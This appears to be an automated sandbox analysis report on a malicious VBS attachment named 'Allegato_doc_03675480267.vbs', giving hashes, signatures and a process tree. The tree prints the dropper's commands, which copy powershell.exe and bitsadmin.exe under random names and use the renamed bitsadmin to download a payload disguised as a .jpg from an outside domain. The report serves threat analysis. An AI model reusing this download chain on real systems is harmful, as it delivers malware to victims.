Analysis
- max time kernel: 30s
- max time network: 113s
- platform: windows10_x64
- resource: win10v200722
- submitted: 14-09-2020 12:24
Static task: static1
Behavioral task: behavioral1
Sample: Allegato_doc_03675480267.vbs
Resource: win7, windows7_x64
0 signatures
0 seconds
General
- Target: Allegato_doc_03675480267.vbs
- Size: 4KB
- MD5: a824af955b840327f2cf795b1b7fcabf
- SHA1: a13ec743a3a4476339c7e521e57b431355a5c67e
- SHA256: 1dba2064e7290c1896d560ff266a18cb6bd9b7e82aad50ddcbe2afde3e43c53e
- SHA512: acab55eed2f7468495758666d67e9593eb9e32f44da823b2b0ac7560d78f76b0f1dded255f8f51a68023e3881fc46b1b362b1fb8c47517f5179fe26d7b5cba92
Malware Config
Signatures
- Executes dropped EXE (1 IoCs)

  pid   Process
  4012  WhZRIiim.exe

- Suspicious use of WriteProcessMemory (7 IoCs)

  description                      pid  Process      procid_target
  PID 592 wrote to memory of 1628  592  WScript.exe  71
  PID 592 wrote to memory of 1628  592  WScript.exe  71
  PID 592 wrote to memory of 2708  592  WScript.exe  74
  PID 592 wrote to memory of 2708  592  WScript.exe  74
  PID 592 wrote to memory of 4012  592  WScript.exe  76
  PID 592 wrote to memory of 4012  592  WScript.exe  76
  PID 592 wrote to memory of 4012  592  WScript.exe  76
Processes
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_03675480267.vbs"
  PID: 592
  Suspicious use of WriteProcessMemory

  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zWhZRIiim.exe
    PID: 1628

  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\WhZRIiim.exe
    PID: 2708

  - C:\Users\Admin\AppData\Roaming\WhZRIiim.exe
    "C:\Users\Admin\AppData\Roaming\WhZRIiim.exe" /transfer szlqLE /download https://unequipoganador.com/ipol/03675480267/map.jpg C:\Users\Admin\AppData\Roaming\map.jpg
    PID: 4012
    Executes dropped EXE